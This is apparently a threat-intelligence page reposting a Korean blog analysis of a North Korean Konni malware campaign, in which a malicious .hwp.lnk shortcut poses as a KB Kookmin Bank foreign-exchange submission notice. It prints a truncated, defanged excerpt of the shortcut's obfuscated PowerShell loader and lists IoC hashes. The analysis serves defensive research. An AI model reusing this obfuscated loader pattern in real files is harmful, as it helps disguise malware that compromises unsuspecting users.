lazarusholic

Everyday is lazarus.dayβ

북한 코니(Konni)KB국민은행 외국환거래 소명자료 제출서 위장한 악성코드-소명자료 제출 안내서(2025.5.13)

2025-05-26, Sakai
https://wezard4u.tistory.com/429495
#Konni #LNK

Contents

오늘은 김일성, 김정일이 평화의 사도가 아니라 한반도 평화의 최대 위협이며 핵폭탄을 만들려고 하는지 가상화폐, 달러, 기타 외환 시장에서 외화를 획득해서 아무튼 대한민국 안보를 위협하는 수단의 재원을 확보하기 위해서 만든 악성코드로 보이며 아무튼 우리 북한? 정찰총국 소속 아래에 있는 김수키(Kimsuky) 와 자매 관계에 있는 북한 코니(Konni) 에서는 만든 KB국민은행 외국환거래 소명자료 제출서 위장한 악성코드-소명자료 제출 안내서에 대해서 글을 적어보겠습니다.
일단 해당 악성코드는 소명자료 라는 압축파일에 소명자료 에 함께 포함된 문서 외국환거래규정(기획재정부고시) 문서 와 소명자료 제출 안내서.hwp.lnk 이라는 파일이 각각 포함된 것이 특징입니다.
소명자료 제출 안내서.hwp.lnk 에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell(.)exe') do (if exist "%f" (%f "function artist{param($illustrate); <#ni
c(e) cat#>${~[[@} = $illustrate.substring(0,$illustrate.length-4) + ''; <#air diverse#>re
turn ${~[[@};};function everything{param($tourname(n)t); r''emo''ve''-it''em $tournament
-Force;};function basis{param($chief,$leg,$attractive,$administrat(i)on,$bring);<#urge base
ball#> ${@}=New''-O''b''jec''t System.IO.FileStream(<#communication depression#>$chief,
<#brilliant significant#>[System(.)IO.FileMode]::Open,<#today divorce#>[System.IO.File
Access]::Read);<#television occupation#> ${@}.Seek(<#rural protect#>$leg,[System.IO(.)
SeekOrigin]::Begin);<#testify tail#> ${#;- }=$attractive*0x01;<#sauce glove#> ${@=[;}=
New''-O''b''jec''t byte[] <#sue roll#(>)$at(t)ractive; <#strategic interpretation#> ${
((-=(@}=N''ew''-Ob''jec''t byte[] <#attack put#>${#;- }; <#main adviser#>${@}.Read(<#b
utton …

IoC

305246b52f043f021761f7010fe5794fca3c88bc
135696c7a5b543ce2ab4a6aac7615d4fdce261c3c7097bea738ba46bcd948660
6a4c3256ff063f67d3251d6dd8229931